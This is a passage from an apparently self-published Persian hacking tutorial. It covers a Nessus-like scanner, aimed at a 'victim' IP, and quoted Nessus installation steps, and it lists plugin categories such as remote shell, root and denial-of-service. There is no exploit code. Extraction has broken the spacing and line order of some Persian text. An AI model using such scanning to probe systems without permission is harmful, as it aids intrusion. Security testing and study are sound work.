ﺧﻮب ﻣﺎ ایﻦ را هﻢ ذﮐﺮ ﮐﻨﻢ ﺕﻮ ﺷﺒﮑﻪ ﺧﺎﻧﻪ ﺧﻮدﻣﺎن هﻢ ﺁزﻣﺎیﺶ ﮐﺮدم هﻢ ﺕﻮ ﺷﺒﮑﻪ ﺟﻬﺎﻧﯽ وﻟﯽ " اﺷﮑﻮل " ﺏﺎز ایﻦ را ﺏﻪ ﻣﺎ ﺟﻮاب داد . وﻟﯽ ﻧﻤﻴﺸﻮد در ﺡﻖ ایﻦ ﺏﺮﻧﺎﻣﻪ اﺟﺤﺎف ﮐﺮد ﮐﺎرش درﺱﺖ اﺱﺖ ﺏﺮای اﺱﮑﻦ ﺧﻮد رایﺎﻧﻪ ﺷﻤﺎ .ﺧﻴﻠﯽ ﺷﺒﻴﻪ Nessusاﺱﺖ .اول ﺱ ﺮور ﺁن ﺏﺎی ﺪ ﺏ ﺎﻻ ﺏﺎﺷﺪ ﮐﻪ اﺻﻮﻻ هﻤﻴﺸﻪ ﺧﺪا ﺏﺎﻻ اﺱﺖ ﺏ ﺮای ﺧ ﺎﻣﻮش ﮐ ﺮدﻧﺶ ﺏﺎی ﺪ از ﺏﺮﻧﺎﻣ ﻪ هﻤ ﺮاﻩ ﺧ ﻮدش ﺏ ﺎ ﻧ ﺎم Scan Server Configurationﺏﺎی ﺪ اﺱ ﺘﻔﺎدﻩ ﮐﻨﻴﺪ ﺕﻮﺻﻴﻪ ﻣﻴﮑﻨﻢ ﮐﻪ ﺏﻪ ﻏﻴﺮ از ﻣﻮارد اﺱﺘﻔﺎدﻩ ﺡﺘﻤﺎ از ﮐﺎر ﺏﻴﻨﺪازد ایﻦ ﺱﺮور را. ﺧﻮب یﮏ ﺏﺮﻧﺎﻣﻪ ﺧﻮب هﻤﺮاﻩ ایﻦ ﻧﺮم اﻓﺰار اﺱﺖ ﺏﻪ ﻧﺎم nasl.exeﮐﻪ ﮐﺎرش ویﺮایﺶ scriptsهﺎی Naslاﺱﺖ ﮐﻪ ﻣﻴﺸﻮد ﺕﻐﻴﺮات ﻣ ﻮرد ﻧﻈ ﺮ ﺧﻮد را روی ﺁﻧﻬﺎ اﻋﻤﺎل ﮐﺮد اﻟﺒﺘﻪ ﻣﻴﺸﻮد ﺏﺮای ﺕﻤ ﺎﻣﯽ ﻧ ﺮم اﻓﺰاره ﺎیﯽ ﮐ ﻪ از scriptsه ﺎی Nessusاﺱ ﺘﻔﺎدﻩ ﻣﻴﮑﻨﻨ ﺪ ﺏ ﻪ ﮐ ﺎر ﺏ ﺮد .در ﮐ ﻞ ﺧ ﻮب اﺱﺖ ایﻦ ﺏﻪ ﺧﻮدﺕﺎن ﻣﻴﺴﭙﺎرم !! ﮐﺎر ﺏﺎ ایﻦ ﺏﺮﻧﺎﻣﻪ ﺱﺎدﻩ اﺱﺖ ﺏﻌﺪ از وارد ﮐﺮدن IPﻗﺮﺏﺎﻧﯽ و زدن ﮐﻠﻴﺪ Nextﺷﻤﺎ ﺏﻪ ﺻﻔﺤﻪ ﻣﻴﺮویﺪ ﮐﻪ در ﺁﻧﺠﺎ ﭼﻬﺎر ﮔﺰیﻨﻪ اﺱ ﺖ ﮐ ﻪ ﺏ ﻪ ﺕﺮﺕﻴ ﺐ ﻋﺒﺎرﺕﻨﺪ از: ﮔﺰیﻨﻪ ) : Enable all but dangerous plugins (Recommendedیﻌﻨﯽ ﺕﻤﺎم scriptsﺏﺠﺰ scriptsه ﺎی ﺧﻄﺮﻧ ﺎک ﮐ ﻪ ﺏﺎﻋ ﺚ ﻧ ﺎ ﭘﺎی ﺪاری ﺱﻴﺴﺘﻢ ﻣﯽ ﺷﻮد یﺎ ﺏﺎﻋﺚ ﻟﻮ رﻓﺘﻦ ﻣﯽ ﺷﻮد. ﮔﺰیﻨﻪ ) : Enable all plugins (Even dangerous plugins are enabledﮐﻪ یﻌﻨﯽ ﺕﻤﺎم scriptsهﺎ ﺏﻌﻼوﻩ scriptsهﺎی ﺧﻄﺮﻧﺎک. ﮔﺰیﻨﻪ ) : Use a predefined plugin set (You can manage them hereﺏ ﺎ اﻧﺘﺨ ﺎب ای ﻦ ﮔﺰیﻨ ﻪ ی ﮏ ﺱ ﺮی ﭘ ﻮیﺶ ه ﺎی دﺱ ﺘﻪ ﺏﻨ ﺪی ﺷ ﺪﻩ اﻧﺠﺎم ﻣﻴﺪهﺪ ﮐﻪ اﻟﺒﺘﻪ ﺟﺰﺋﻴﺎت ﻗﺎﺏﻞ ﺕﻨﻈﻴﻢ ﻧﻴﺴﺖ و ﺷﻤﺎ ﺏﺎیﺪ دﺱﺘﻪ ﻣﻮرد ﻧﻈﺮ ﺧﻮد را اﻧﺘﺨﺎب ﮐﻨﻴﺪ. ﮔﺰیﻨﻪ ) : Define my own set of plugins (For advanced userﮐﻪ ﺏﺎ اﻧﺘﺨﺎب ایﻦ ﮔﺰیﻨﻪ ﺏﺎیﺪ scriptsهﺎی ﻣﻮرد ﻋﻼﻗﻪ ﺧﻮد را اﻧﺘﺨﺎب ﮐﻨﻴﺪ ﺏﻌﺪ ﭘﻮیﺶ را ﺷﺮوع ﮐﻨﻴﺪ.
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٤٧
ﺧﻮب یﮑﯽ را ﺏﻪ ﻓﺮاﺧﻮر ﺡﺎل ﺧﻮد اﻧﺘﺨﺎب ﮐﺮدﻩ یﺎ اﮔﺮ ﺱﻪ ﮔﺰیﻨﻪ اوﻟﯽ ﺏﺪرد ﺷ ﻤﺎهﺎ ﻧﻤ ﯽ ﺧ ﻮرد و ی ﺎ ﻣﻴﺨﻮاهﻴ ﺪ ﺧﻮدﺕ ﺎن اﻧﺘﺨ ﺎب ﮐﻨﻴ ﺪ درﺏ ﺎرﻩ ﭼ ﻪ ﺏﮕﺮدد ﮔﺰیﻨﻪ ﺁﺧﺮ را اﻧﺘﺨﺎب ﮐﻨﻴﺪ ﮐﻪ در ﺁﻧﺠﺎ هﺮ ﭼﻪ ﺧﻮاﺱﺘﻴﺪ اﻧﺘﺨﺎب ﮐﻨﻴﺪ ﺏﻌﺪ ﺷﺮوع ﺏﻪ ﭘﻮیﺶ ﮐﻨﻴﺪ. ﺏﻪ ایﻦ ﺕﺮﺕﻴﺐ ﻣﻴﺸﻮد ﮔﻔﺖ یﮏ ﭘﻮیﺶ ﺏﺎ %٩٠از اﻣﮑﺎﻧﺎت ﺏﺮﻧﺎﻣﻪ Nessusرا اﻧﺠﺎم دادﻩ ایﺪ هﻤﻴﻦ دیﮕﺮ. ﻣﻌﺮﻓﯽ ﺏﺮﻧﺎﻣﻪ : Nessus ﻗﺒﻞ از هﺮ ﭼﻴﺰ ﺏﺎیﺪ ایﻦ ﺱﺮﻃﺎن را ﻧﺼﺐ ﮐﻨﻴﺪ .ﻧﺼﺐ ایﻦ ﺷﺒﺢ ﻣ ﺴﺘﻠﺰم ﻧ ﺼﺐ دو ﺏﺮﻧﺎﻣ ﻪ دیﮕ ﺮ ﺏ ﺎ ﻋﻨ ﻮان GIMP Toolkitی ﺎ GTKو nmap ﻣﻴﺒﺎﺷﺪ ﮐﻪ ﻣﻌﻤﻮﻻ ﺷﻤﺎ اﮔﺮ ﻣﻮﻗﻊ ﻧﺼﺐ ﻟﻴﻨﻮﮐﺲ یﺎ هﺮ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ ﮐﺪ ﺏﺎز ﮔﺰیﻨﻪ هﺎی ﻣﺪیﺮیﺘﯽ را اﻧﺘﺨﺎب ﮐﺮدﻩ ﺏﺎﺷﻴﺪ ای ﻦ ﻣﺮﺡﻠ ﻪ را ﻻزم ﻧﺪاری ﺪ. ﺏﺮﻧﺎﻣﻪ Nessusدر ﭼﻬﺎر ﻗﺎﻟﺐ ﻣﺨﺘﻠﻒ ﺏ ﺎ ﻋﻨ ﺎویﻦ Nessus-librariesو Nessus-coreو Nessus-pluginsﺏ ﻪ ﻣﻨﻈ ﻮر ﺏ ﺎرﮔﻴﺮی و ﻧ ﺼﺐ ﻣﻨﺘﺸﺮ ﺷﺪﻩ اﺱﺖ .ﻧﺼﺐ ﺏﺮﻧﺎﻣﻪ Nessusاز ﻃﺮیﻖ هﺮ یﮏ از ایﻦ ﺱﻪ ﻧﻮع ﺏﺴﺘﻪ هﺎ ﻣﺴﺘﻠﺰم ﻃﯽ ﻣﺮاﺡﻞ اﺱﺘﺎﻧﺪارد ﺏ ﺎرﮔﻴﺮی ،ﮐﺎﻣﭙﺎی ﻞ و ﻧ ﺼﺐ ) ﮐﻪ ﻣﺮاﺡﻞ ﺁن ﺏﻪ ﺕﺮﺕﻴﺐ ﻋﺒﺎرﺕﻨﺪ از اﺟﺮای ﻓﺮاﻣﻴﻦ ﻣﺮﺏﻮﻃﻪ ،یﻌﻨﯽ Mack ، configureو Mack installاﺱﺖ( ﻣﻴﺒﺎﺷ ﺪ .ای ﻦ ﺏﺮﻧﺎﻣ ﻪ در ﻗﺎﻟ ﺐ ﭼﻬﺎرﻣﯽ ﮐﻪ یﮏ ﺁرﺷﻴﻮ ﻣﻨﻔﺮد shellﻧﻴﺰ ﺏﺎ ﻋﻨﻮان Nessus-installer.shﻣﻨﺘﺸﺮ ﻣﻴﺸﻮد ﮐﻪ ﺷﺎﻣﻞ ﮐﻠﻴﻪ ﮐﺪ هﺎی ﻣ ﻮرد ﻧﻴ ﺎز ﺏ ﻮدﻩ و ﻓﺮایﻨ ﺪ ﻧ ﺼﺐ را ﺏﻪ ﮔﻮﻧﻪ ای ﻣﻨﺎﺱﺐ ﮐﻨﺘﺮل ﻣﯽ ﮐﻨﺪ .ﻣﻦ ﺏ ﻪ ﻋﻠ ﺖ ایﻨﮑ ﻪ ﺁﻗ ﺎی ﺁراز در ﺱ ﺎیﺖ Tur2.comﻣﺮاﺡ ﻞ ﻧ ﺼﺐ را ﺧ ﻮب ﺕﻮﺽ ﻴﺢ دادﻩ اﻧ ﺪ ،ای ﻦ ﻣﻘﺎﻟ ﻪ ﺏﻌﻼوﻩ ﻟﻴﻨﮏ ﺁن را در ﻣﻘﺎﻟﻪ ﺧﻮد ﻗﺮار ﻣﻴﺪهﻢ و ﺕﻮﺽﻴﺢ و اﻟﺒﺘﻪ ﺕﺎیﭗ اﺽﺎﻓﯽ ﺧﻮد داری ﻣﻴﮑﻨﻢ : ﻟﻴﻨﮏ ﻣﻘﺎﻟﻪ http://www.tur2.com/articles/n13810631.htm : ﻣﺘﻦ ﻣﻘﺎﻟﻪ ) ﻓﻘﻂ ﻗﺴﻤﺖ ﻧﺼﺐ ﺏﺮﻧﺎﻣﻪ ﺁوردﻩ ﺷﺪﻩ اﺱﺖ و از ﺁوردن ﻗﺴﻤﺘﻬﺎی دیﮕﺮ ﺧﻮد داری ﺷﺪﻩ اﺱﺖ ( : ﭼﻄﻮري ﻧﺼﺐ ﮐﻨﻢ؟
اوﻻ ﺑﺎﻳﺪ در ﻣﻮد rootﻳﻌﻨﻲ super-userﺑﻪ ﻟﻴﻨﻮﮐﺲ loginﮐﺮدﻩ ﺑﺎﺷﻴﺪ .ﺣﺎﻻ shellﻟﻴﻨﻮﮐﺲ رو ﺑﺎز ﮐﺮدﻩ و ﺑﻪ داﻳﺮﮐﺘﻮري ﮐﻪ ﻓﺎﻳﻞ رو اوﻧﺠﺎ داونﻟﻮد ﮐﺮدﻩاﻳﺪ وارد ﻣﻲﺷﻮﻳﺪ .ﻣﺜﻼ اﮔﺮ در /root/Desktopﻓﺎﻳﻞ رو داونﻟﻮد ﮐﺮدﻩاﻳﺪ ،ﻣﻲﻧﻮﻳﺴﻴﺪ: # cd /root/Desktop ﺣﺎﻻ دﺳﺘﻮر زﻳﺮ رو ﻣﻲﻧﻮﻳﺴﻴﺪ: # sh nessus-installer.sh ﺑﻼﻓﺎﺻﻠﻪ ﺻﻔﺤﻪ ﭘﺎک ﻣﻲﺷﻪ و ﻧﻮﺷﺘﻪ زﻳﺮ ﻣﻴﺎد )اﻟﺒﺘﻪ ﺻﻔﺤﻪ ﭘﺎک ﻧﻤﻲﺷﻪ ﻓﻘﻂ اﻳﻨﮑﻪ اﻧﻘﺪر ﻧﻮﺷﺘﻪ ﻣﻴﺎد ﮐﻪ ﺑﻪ ﻧﻈﺮ ﻣﻴﺮﺳﻪ ﺻﻔﺤﻪ ﭘﺎک ﺷﺪﻩ(: -------------------------------------------------------------------------------NESSUS INSTALLATION SCRIPT --------------------------------------------------------------------------------
! Welcome to the Nessus Installation Script
This script will install Nessus 2.0.7 (STABLE) on your system.
Please note that you will need root privileges at some point so that the installation can complete.
Nessus is released under the version 2 of the GNU General Public License (see http://www.gnu.org/licences/gpl.html for details).
To get the latest version of Nessus, visit http://www.nessus.org
Press ENTER to continue
٤٨
!! آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم
ﺻﻔﺤﻪ
: ﻳﻪ ﺳﺮي ﭼﺮت و ﭘﺮت ﻧﻮﺷﺘﻪ ﻣﻴﺸﻪ و ﺻﻔﺤﻪ ﭘﺎک ﺷﺪﻩ و ﻣﺘﻦ زﻳﺮ ﻣﻴﺎد. رو ﻓﺸﺎر ﻣﻲدهﻴﺪEnter دﮐﻤﻪ -------------------------------------------------------------------------------Nessus installation : installation location --------------------------------------------------------------------------------
Where do you want the whole Nessus package to be installed ? [/usr/local]
: ﺣﺎﻻ ﺻﻔﺤﻪ ﭘﺎک ﻣﻴﺸﻪ و ﻧﻮﺷﺘﻪ زﻳﺮ ﻣﻴﺎد. ﻧﺼﺐ ﺑﺸﻪ/usr/local رو ﻓﺸﺎر ﺑﺪﻳﻦ ﮐﻪ در ﻣﺤﻞ ﭘﻴﺶﻓﺮض ﻳﻌﻨﻲEnter رو ﮐﺠﺎ ﻧﺼﺐ ﮐﻨﻢ؟ ﺷﻤﺎ دﮐﻤﻪNessus اﻳﻦ ﻣﻴﮕﻪ ﮐﻪ -------------------------------------------------------------------------------Nessus installation : Ready to install --------------------------------------------------------------------------------
Nessus is now ready to be installed on this host. The installation process will first compile it then install it
Press ENTER to continue ﺑﺎزهﻢ ﭼﺮت و ﭘﺮتهﺎ ﺷﺮوع ﺑﻪ ﻇﺎهﺮ ﺷﺪن ﻣﻲﮐﻨﻨﺪ وﻟﻲ اﻳﻦدﻓﻌﻪ ﻳﮑﻢ ﺑﻴﺸﺘﺮ ﻃﻮل ﻣﻴﮑﺸﻪ ﮐﻪ اراﺟﻴﻒ ﺗﻤﻮم ﺑﺸﻦ ) اﻳﻨﺎ اﺑﺪا اراﺟﻴﻒ ﻧﻴﺴﺘﻨﺪ وﻟﻲ ﭼﻮن ﻣﺎ ﺑﻪ ﺻﻮرت . اﺻﻼ ﻟﺰوﻣﻲ ﻧﺪارﻩ ﻓﮑﺮﺗﻮن رو ﺧﺮاب ﺑﮑﻨﻴﺪ! ( ﺣﺎﻻ ﻣﻲﺗﻮﻧﻴﻦ ﻳﻪ ﭼﺎﻳﻲ واﺳﻪ ﺧﺪﺗﻮن ﺑﺮﻳﺰﻳﻦ و ﭼﻨﺪ دﻗﻴﻘﻪ اﺳﺘﺮاﺣﺖ ﮐﻨﻴﺪ،اﺗﻮﻣﺎﺗﻴﮏ دارﻳﻢ ﻧﺼﺐ ﻣﻲﮐﻨﻴﻢ : ﺻﻔﺤﻪ زﻳﺮ ﻇﺎهﺮ ﻣﻴﺸﻪ،وﻗﺘﻲ ﮐﺎر ﻧﺼﺐ ﺗﻤﻮم ﺷﺪ -------------------------------------------------------------------------------Nessus installation : Finished --------------------------------------------------------------------------------
Congratulations ! Nessus is now installed on this host
. Create a nessusd certificate using /usr/local/sbin/nessus-mkcert . Add a nessusd user use /usr/local/sbin/nessus-adduser . Start the Nessus daemon (nessusd) use /usr/local/sbin/nessusd -D . Start the Nessus client (nessus) use /usr/local/bin/nessus . To uninstall Nessus, use /usr/local/sbin/uninstall-nessus
. Remember to invoke 'nessus-update-plugins' periodically to update your list of plugins
. A step by step demo of Nessus is available at : http://www.nessus.org/demo/
Press ENTER to quit . اﻳﻦ ﺻﻔﺤﻪ ﺁﺧﺮ اﻃﻼﻋﺎت ﻣﻬﻤﻲ دارﻩ ﮐﻪ ﺗﻮﺿﻴﺢ ﻣﻲدم. ﺑﺰﻧﻴﺪ ﮐﻪ ﻧﺼﺐ ﺗﻤﻮم ﺑﺸﻪEnter ﻳﻪ :اوﻟﻴﻦ ﺟﻤﻠﻪ اﻳﻨﻪ
٤٩
!! آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم
ﺻﻔﺤﻪ
Create a nessusd certificate using /usr/local/sbin/nessus-mkcert : ﻣﻲﻧﻮﻳﺴﻴﻢShell ﭘﺲ ﻣﺎ در # /usr/local/sbin/nessus-mkcert : ﺻﻔﺤﻪ ﭘﺎک ﺷﺪﻩ و ﻣﺘﻦ زﻳﺮ ﻇﺎهﺮ ﻣﻴﺸﻪ، ﺑﺰﻧﻴﻢEnter وﻗﺘﻲ ------------------------------------------------------------------------------Creation of the Nessus SSL Certificate -------------------------------------------------------------------------------
This script will now ask you the relevant information to create the SSL certificate of Nessus. Note that this information will *NOT* be sent to anybody (everything stays local), but anyone with the ability to connect to your Nessus daemon will be able to retrieve this information.
CA certificate life time in days [1460]: : ﺑﻪ ﺻﻮرت زﻳﺮ. ﺗﻤﻮم ﺑﺸﻪcertification ﺑﻪ ﺗﺮﺗﻴﺐ ﻣﻲزﻧﻴﻢ ﺗﺎ ﮐﺎر اﻳﺠﺎدEnter ﺗﺎ۶ از هﻤﻴﻨﺠﺎ ﺗﺎ ﺁﺧﺮ ﮐﺎر CA certificate life time in days [1460]: Server certificate life time in days [365]: Your country (two letter code) [FR]: Your state or province name [none]: Your location (e.g. town) [Paris]: Your organization [Nessus Users United]: :ﺑﻌﺪ ﺻﻔﺤﻪ زﻳﺮ ﻣﻴﺎد ------------------------------------------------------------------------------Creation of the Nessus SSL Certificate -------------------------------------------------------------------------------
Congratulations. Your server certificate was properly created.
/usr/local/etc/nessus/nessusd.conf updated
The following files were created :
. Certification authority : Certificate = /usr/local/com/nessus/CA/cacert.pem Private key = /usr/local/var/nessus/CA/cakey.pem
. Nessus Server : Certificate = /usr/local/com/nessus/CA/servercert.pem Private key = /usr/local/var/nessus/CA/serverkey.pem
Press [ENTER] to exit . ﺗﺎ ﮐﺎر ﺗﻤﻮم ﺑﺸﻪ، رو هﻢ ﻣﻲزﻧﻴﻢEnter ﺣﺎﻻ ﺁﺧﺮﻳﻦ درﺳﺖ ﮐﻨﻴﻢ ﮐﻪ ﺑﺘﻮﻧﻴﻢnessus روي ﺳﺮورuser ﺣﺎﻻ ﺑﺎﻳﺪ ﻳﮏ. درﺳﺖ ﮐﺮدﻳﻢNessus ﺑﺮايSSL Certificate رو اﺟﺮا ﮐﺮدﻳﻢ و هﻢnessus-installer.sh ﭘﺲ ﻣﺎ ﺗﺎ ﺣﺎﻻ هﻢ : ﺑﺮاي اﻳﻦﮐﺎر از دﺳﺘﻮر زﻳﺮ اﺳﺘﻔﺎدﻩ ﻣﻲﮐﻨﻴﻢ. ﮐﻨﻴﻢlogin ﺑﻌﺪا از ﻃﺮﻳﻖ او ﺑﻪ ﻧﺮماﻓﺰار
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٥٠
# /usr/local/sbin/nessus-adduser ﺑﻪ ﻣﺤﺾ اﺟﺮاي اﻳﻦ دﺳﺘﻮر ﻣﺘﻦ زﻳﺮ ﻇﺎهﺮ ﻣﻴﺸﻪ: Add a new nessusd user ----------------------
Login : اﻳﻦ ﻳﻌﻨﻲ ﻳﮏ usernameوارد ﮐﻦ .اﺳﻢ ﻣﻮرد ﻧﻈﺮ رو وارد ﻣﻲﮐﻨﻴﻢ و ﺑﻌﺪ ﺳﻄﺮ زﻳﺮ ﻣﻴﺎد: Authentication (pass/cert) [pass] : اﻳﻦ ﻳﻌﻨﻲ روش هﻮﻳﺖﺳﻨﺠﻲ ﭼﻲ ﺑﺎﺷﻪ .ﻣﺎ Enterﻣﻲزﻧﻴﻢ ﮐﻪ هﻤﻮن ﭘﻴﺶﻓﺮض ﻳﻌﻨﻲ passﺑﻤﻮﻧﻪ .ﺑﻌﺪ ﺳﻄﺮ زﻳﺮ ﻣﻴﺎد: Login password : اﻳﻨﺠﺎ ﺑﺎﻳﺪ ﭘﺴﻮرد ﺑﺮاي ﻳﻮزر رو وارد ﮐﻨﻴﻢ .اول ﻳﻪ ﻧﮕﺎﻩ ﺑﻪ ﭼﭗ ،ﺑﻌﺪ ﻳﻪ ﻧﮕﺎﻩ ﺑﻪ راﺳﺖ ،ﺑﻌﺪ ﻳﻪ ﻧﮕﺎﻩ ﺑﻪ ﻋﻘﺐ! ﺣﺎﻻ ﭘﺴﻮرد رو ﺑﻨﻮﻳﺴﻴﺪ ) از ﮐﺎراﮐﺘﺮ * ﻣﻮﻗﻊ وارد ﮐﺮدن ﭘﺴﻮرد ﺧﺒﺮي ﻧﻴﺴﺖ .واﺳﻪ هﻤﻴﻦ ﻣﺮاﺳﻢ رو ﺑﺠﺎ ﺁوردﻳﻢ! ( ﺣﺎﻻ اﻳﻦ ﻣﺘﻦ ﻇﺎهﺮ ﻣﻴﺸﻪ: User rules ---------nessusd has a rules system which allows you to restrict the hosts that ali has the right to test. For instance, you may want him to be able to scan his own host only.
Please see the nessus-adduser(8) man page for the rules syntax
Enter the rules for this user, and hit ctrl-D once you are done : )(the user can have an empty rules set اﻳﻨﺠﺎ ﻣﻴﺸﻪ ﻳﻪ ﺳﺮي Rulesواﺳﻪ userﺗﻌﺮﻳﻒ ﮐﻨﻴﻢ ﮐﻪ داﻣﻨﻪ ﺟﺎهﺎﻳﻲ ﮐﻪ ﻣﻲﺗﻮﻧﻪ اﺳﮑﻦ ﮐﻨﻪ رو ﻣﺤﺪود ﮐﻨﻴﻢ ،وﻟﻲ ﻓﻌﻼ ﻻزم ﻧﻴﺴﺖ ،ﭘﺲ ﺗﺮﮐﻴﺐ ctrl-Dرو ﻓﺸﺎر ﻣﻲدﻳﻢ .ﺣﺎﻻ اﻳﻦ ﻇﺎهﺮ ﻣﻴﺸﻪ: : xxxxxxxxxx
Login
: yyyyyyyyy
Password
:
DN
:
Rules
]Is that ok ? (y/n) [y ﻳﻪ Enterﻣﻲزﻧﻴﻢ ﮐﻪ ﮐﺎر ﺗﻤﻮم ﺑﺸﻪ. ﺗﺒﺮﻳﮏ ﻣﻲﮔﻢ .ﻧﺮماﻓﺰار nessusﺑﻪ هﻤﻴﻦ راﺣﺘﻲ ﻧﺼﺐ ﺷﺪ!
-ﻧﺮماﻓﺰار رو ﻧﺼﺐ ﮐﺮدم .ﺣﺎﻻ ﭼﻄﻮري nessusرا اﺟﺮا ﮐﻨﻴﻢ؟
-١هﺮ ﺑﺎر ﮐﻪ ﮐﺎﻣﭙﻴﻮﺗﺮ رو restartﻣﻲﮐﻨﻴﺪ ،اﮔﻪ ﺑﺨﻮاﻳﻦ از nessusاﺳﺘﻔﺎدﻩ ﮐﻨﻴﺪ ،اول ﺑﺎﻳﺪ ﺳﺮور nessusرو اﺟﺮا ﮐﻨﻴﺪ .ﺑﺮاي اﺟﺮا ﮐﺮدن ﺳﺮور nessusﮐﻪ ﺑﻪ اون nessus daemonﻳﺎ ﺑﻪ ﺷﮑﻞ ﺧﻼﺻﻪ nessusdﻣﻲﮔﻦ ،دﺳﺘﻮر زﻳﺮ رو ﻣﻲﻧﻮﻳﺴﻴﻢ: # /usr/local/sbin/nessusd -D ﺑﻪ اﻳﻦ راﺣﺘﻲ ﺳﺮور nessusراﻩاﻧﺪازي ﻣﻲﺷﻮد. -٢ﺣﺎﻻ ﮐﻼﻳﻨﺖ رو اﺟﺮا ﻣﻲﮐﻨﻴﻢ .ﻧﮑﺘﻪ ﻣﻬﻢ اﻳﻨﮑﻪ هﺮ ﭼﻨﺪ ﺗﺎ ﮐﻼﻳﻨﺖ ﮐﻪ ﺑﺨﻮاﻳﻦ ﻣﻲﺗﻮﻧﻴﻦ اﺟﺮا ﮐﻨﻴﺪ .ﺑﺮاي اﻳﻦ ﮐﺎر از دﺳﺘﻮر زﻳﺮ اﺳﺘﻔﺎدﻩ ﻣﻲﺷﻮد: # /usr/local/bin/nessus ﺑﺎ اﺟﺮاي اﻳﻦ دﺳﺘﻮر ﭘﻨﺠﺮﻩ ﻧﺮماﻓﺰار ﻇﺎهﺮ ﻣﻴﺸﻪ .ﺗﻮﺟﻪ ﮐﻨﻴﺪ ﮐﻪ nessusدر ﺣﺎﻟﺖ ﻣﺘﻨﻲ هﻢ ﮐﺎر ﻣﻲﮐﻨﻪ وﻟﻲ اﺳﺘﻔﺎدﻩ از ﺣﺎﻟﺖ ﮔﺮاﻓﻴﮑﻲ راﺣﺖﺗﺮ اﺳﺖ.
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٥١
ﺧﻮب اﻣﻴﺪ وارم ﮐﺎﻣﻞ ﺏﺎﺷﺪ واﻗﻌﺎ ﺏﻌﺪ از ﻧﻮﺷﺘﻦ ایﻦ ٥٠اﻧﺪی ﺻﻔﺤﻪ ﺡﺎل ﺕﺎیﭗ ﺏﺮام ﻧﻤﻮﻧﺪﻩ . ﺏﺎ ﻋﺮض ﭘﻮزش از ﻧﻮیﺴﻨﺪﻩ ﻣﻘﺎﻟﻪ ﺏﺎﻻ !! ﺧﻮب وﻗﺘﯽ ﺏﺮﻧﺎﻣﻪ ﺏﺎﻻ ﺁﻣﺪ اول از ﺷﻤﺎ ﻧﺎم ﮐﺮﺏﺮی و ﮐﻠﻤﻪ ﻋﺒﻮر را ﻣﻴﺨﻮاهﺪ .ﺷ ﺎیﺪ ﺏﻌ ﺪ از ای ﻦ ﻣﺮﺡﻠ ﻪ ﭘﻨﺠ ﺮﻩ ای ﺏ ﺎز ﺷ ﻮد و ﺷ ﻤﺎ ان را از ﺡﺎﻟ ﺖ ﭘﻴﺶ ﻓﺮض ﺕﻐﻴﻴﺮ ﻧﺪهﻴﺪ و OKرا ﺏﺰﻧﻴﺪ .ﺏﻌﺪ از ایﻦ ﻣﺮﺡﻠﻪ ﺏﻪ ﺏﺮﮔﻪ Pluginsﻣﻴﺮﺱﻢ ﮐﻪ هﺮیﮏ از Scriptهﺎ ،دﺱ ﺘﻪ ﺏﻨ ﺪی ﺷ ﺪﻩ اﺱ ﺖ ،ﮐ ﻪ ﻣ ﻦ دﺱﺘﻪ هﺎ را در ﺟﺪول زیﺮ ﺕﻮﺽﻴﺢ دادﻩ ام ﮐﺎر ﺁﻧﻬﺎ را : ١
ﻧﺎم Plug-in Miscellaneous
٢
Gain a shell remotely
٣
Finger abuses
۴
Windows
۵ ۶
Backdoor General
٧
SNMP
٨
CGI abuses
٩
Remote file Access
١٠
RPC
١١
Gain root remotely
١٢
Firewalls
١٣
Useless service
١۴
Denial-of-Service
١۵
FTP
١۶
NIS
١٧
SMTP problems
١٨
Windows User Managemnt
ﺕﻮﺽﻴﺢ ﻋﻤﻠﮑﺮد دﺱﺘﻪ ایﻦ Scriptهﺎ ﺁزﻣﻮﻧﻬﺎیﯽ درﺏﺎرﻩ ﺡﺴﺎب هﺎی ﮐﺎرﺏﺮی و ﻣﺴﻴﺮﺟﻮهﺎ و..اﻧﺠﺎم ﻣﻴﺪهﻨﺪ ایﻦ Scriptهﺎ ﺁزﻣﻮﻧﻬﺎیﯽ ر ﺏﺎرﻩ ﺱﺮ ریﺰی ﺏﺎﻓﺮ و ﮔﺮیﺰ از دﺱﺖ ﺱﻴﺴﺘﻢ اﺡﺮاز هﻮیﺖ اﻧﺠﺎم ﻣﻴﺪهﻨﺪ. ایﻦ Scriptهﺎ ﺁزﻣﻮﻧﻬﺎیﯽ در ﺏﺎرﻩ ﺷﺒﺢ Fingerﮐﻪ اﻣﮑﺎن دﺱﺘﻴﺎﺏﯽ ﺏﻪ ﻓﺎیﻞ هﺎی ﺡﻔﺎﻇﺖ ﺷﺪﻩ ،ﻓﺮﻣﺎﻧﻬﺎی ﺱﻴﺴﺘﻤﯽ ﺡﻔﺎﻇﺖ ﺷﺪﻩ و اﻃﻼﻋﺎت ﺡﻔﺎﻇﺖ ﺷﺪﻩ ﮐﺎرﺏﺮان را در اﺧﺘﻴﺎر ﻣﻬﺎﺟﻢ ﻣﻴﮕﺰارد ،اﻧﺠﺎم ﻣﯽ دهﺪ. ایﻦ Scriptﺁزﻣﻮﻧﻬﺎیﯽ در ﺏﺎرﻩ ﭘﺮوﺕﮑﻞ هﺎی SMBو NetBIOSو ﺱﺎیﺮ ﺡﻔﺮﻩ هﺎی ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ ویﻨﺪوز اﻧﺠﺎم ﻣﻴﺪهﺪ. ایﻦ Scriptهﺎ دﻧﺒﺎل ﺏﺮﻧﺎﻣﻪ هﺎی اﺱﺐ ﺕﺮﺁوا ﻣﻴﮕﺮدد . ایﻦ Scriptهﺎ 